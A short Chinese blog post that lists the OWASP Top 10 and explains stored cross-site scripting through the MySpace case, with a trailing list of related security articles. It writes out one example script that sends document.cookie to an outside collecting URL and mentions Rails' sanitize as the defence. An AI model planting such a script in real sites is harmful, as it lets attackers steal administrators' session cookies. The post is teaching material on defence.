owasp.org列出
十大Web应用漏洞清单:
1, Cross Site Scripting(XSS)
2, Injection Flaws
3, Malicious File Execution
4, Insecure Direct Object Reference
5, Cross Site Request Forgery(CSRF)
6, Information Leakage and Improper Error Handling
7, Broken Authentication and Session Management
8, Insecure Cryptographic Storage
9, Insecure Communications
10, Failure to Restrict URL Access
XSS排在第一位,MySpace著名的漏洞案就是由于受到XSS攻击,原理很简单,在用户提交的数据中包含JavaScript脚本
例如在修改用户Profile时用户在一个输入框内输入如下内容:
<script>
$.ajax("some url" + document.cookie)
</script>
这样当其他人(如管理员)查看该用户的Profile时,上面这段JavaScript执行,然后将管理员的cookie发送给某个url(可以是一个收集cookie的站点)
这样,管理员的登录认证等信息就暴露了!
而Rails提供了TextHelper#sanitize方法来预防XSS攻击
分享到:
相关推荐
WEB应用安全 之 XSS
XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描
这是大三时软件测试课程的结课论文,论文题目是:《关于Web应用安全中XSS漏洞测试方法的研究》。
web漏洞之XSS_TEST漏洞实践练习代码,下载解压后可直接使用。
95-web漏洞之XSS漏洞挖掘
Web应用安全:XSS篡改页面(实验).docx
Web应用安全:XSS盗取cookiepayload(实验习题).docx
WEB 漏洞-XSS 跨站之订单及 Shell 箱子反杀#XSS 平台及工具使用#XSS 经典应用案例测试#Session 与 Cookie 获取问题docum
Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的简单的文本文件, 这个文件与特定的 Web 文档关联在一起, 保存了该客户机访问这个Web 文档时的信息, 当客户机再次访问这个 Web 文档时这些信息可供该...
Vooki是一款免费且用户界面友好的Web应用漏扫工具,它可以轻松地为你扫描任何Web应用并查找漏洞。Vooki主要包括三个部分,Web应用扫描器,Rest API扫描器以及报告 Sql注入 命令注入 头注入 反射型XSS 存储型XSS ...
007-Web安全基础3 - XSS漏洞
XSS安全隐患产生原因 1 XSS安全隐患 目录 2 XSS安全隐患产生原因 XSS安全隐患 1、网络钓鱼,包括盗取各类用户账号; 2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; 3、劫持...
一、实验目的 了解XSS的有关知识; 了解XSS通过JavaScript实际操作; 了解XSS的攻击原理。 二、实验内容 在Kali上安装beef-xss工具; 在站点上进行XSS JavaScript攻击。 (附加题)使用beef尝试更多XSS JavaScript...
常见的web应用漏洞和检测方案 明文信息传输漏洞 敏感信息泄露 默认或可猜解用户账户 会话重放攻击测试 验证码缺陷 http方法测试 不安全的cookie传输 CSRF漏洞测试 会话设计缺陷 会话定置测试 会话复杂度测试 会话...
tsrc线上培训 第五第六式web安全之xss漏洞、命令执行漏洞专题
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
常见的Web漏洞如XSS、SQL Injection等,都要求攻击者构造一些特殊字符,这些特殊字符可能是正常用户不会用到的,所以输入检查就有存在的必要了。 输入检查,在很多时候也被用于格式检查。 例如,用户在网站注册时...
常见WEB漏洞学习整理-XSS
解决360检查wordpress的xss漏洞问题